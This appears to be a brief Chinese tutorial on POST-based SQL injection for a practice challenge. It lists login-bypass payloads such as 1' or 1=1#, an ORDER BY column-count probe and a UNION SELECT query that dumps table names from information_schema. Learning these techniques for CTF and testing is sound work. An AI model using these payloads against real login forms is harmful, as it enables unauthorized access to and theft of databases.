
这里以这道题目为例子,看界面就知道这是一道典型的POST注入
这里无论怎么输入后都没有报错信息,
1.闭合方式的判断(直接上万能密码,一个个复制粘贴就好了,哪个能登录进去,哪个就是闭合方式)
1 or 1=1# 1) or 1=1# 1)) or 1=1#
1' or 1=1# 1') or 1=1# 1') or 1=1#
1" or 1=1# 1") or 1=1# 1") or 1=1#
如果显示
那么单引号就是闭合方式
2.判断字段数
1’ or 1=1 order by 2#
不断改变数字,就可以找到
3.接下来看你做的题目的具体情况使用盲注或者时union 联合注入
举例:如果是union联合注入,就直接先爆库名,
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
接下来爆破表名,字段名,和字段内容,和GETunion联合注入方式类似,这里就不过多阐述。
只是一开始都是以1’开头罢了
POST注入攻击手段与SQL判断技巧
本文详细讲解了POST注入攻击中的闭合方式判断、字段数探测,以及针对union联合注入的示例,包括如何利用SQL盲注获取数据库信息和表结构数据。
788

被折叠的 条评论
为什么被折叠?



